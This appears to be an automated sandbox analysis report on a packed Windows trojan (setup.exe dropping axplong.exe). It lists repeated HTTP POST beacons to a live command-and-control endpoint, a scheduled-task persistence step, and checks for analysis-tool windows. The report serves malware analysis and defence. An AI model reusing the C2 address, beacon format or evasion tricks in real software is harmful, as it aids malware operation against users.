                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: Joe Sandbox ViewIP Address: 77.91.77.81 77.91.77.81
                  Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0100BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,1_2_0100BD30
                  Source: unknownHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001790000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.000000000170E000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php2
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpR-
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpem32
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpl
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpm32
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpoS
                  Source: axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptI

                  System Summary

                  barindex
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: .idata
                  Source: setup.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01037D631_2_01037D63
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D7C1_2_01058D7C
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D781_2_01058D78
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D881_2_01058D88
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D941_2_01058D94
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D9C1_2_01058D9C
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D981_2_01058D98
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058DB41_2_01058DB4
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0100E4101_2_0100E410
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_010430481_2_01043048
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01004CD01_2_01004CD0
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_010487001_2_01048700
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0104775B1_2_0104775B
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01058D9C1_2_01058D9C
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01042BB01_2_01042BB0
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0104763B1_2_0104763B
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01004AD01_2_01004AD0
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_01046EE91_2_01046EE9
                  Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9983617230191257
                  Source: setup.exeStatic PE information: Section: cykfsdxm ZLIB complexity 0.9944855985060347
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983617230191257
                  Source: axplong.exe.0.drStatic PE information: Section: cykfsdxm ZLIB complexity 0.9944855985060347
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\8254624243Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: setup.exeReversingLabs: Detection: 72%
                  Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: setup.exeStatic file information: File size 1942016 > 1048576
                  Source: setup.exeStatic PE information: Raw size of cykfsdxm is bigger than: 0x100000 < 0x1a8a00

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeUnpacked PE file: 1.2.axplong.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeUnpacked PE file: 2.2.axplong.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cykfsdxm:EW;inbhqvty:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e9d59 should be: 0x1e0026
                  Source: setup.exeStatic PE information: real checksum: 0x1e9d59 should be: 0x1e0026
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: .idata
                  Source: setup.exeStatic PE information: section name:
                  Source: setup.exeStatic PE information: section name: cykfsdxm
                  Source: setup.exeStatic PE information: section name: inbhqvty
                  Source: setup.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: cykfsdxm
                  Source: axplong.exe.0.drStatic PE information: section name: inbhqvty
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 1_2_0101D82C push ecx; ret 1_2_0101D83F
                  Source: setup.exeStatic PE information: section name: entropy: 7.984381286148552
                  Source: setup.exeStatic PE information: section name: cykfsdxm entropy: 7.954405328517533
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.984381286148552
                  Source: axplong.exe.0.drStatic PE information: section name: cykfsdxm entropy: 7.954405328517533
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClassJump to behavior
